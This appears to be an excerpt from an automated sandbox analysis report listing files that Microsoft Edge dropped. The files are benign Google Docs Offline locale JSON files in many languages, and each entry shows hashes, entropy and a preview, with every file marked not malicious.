                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2778
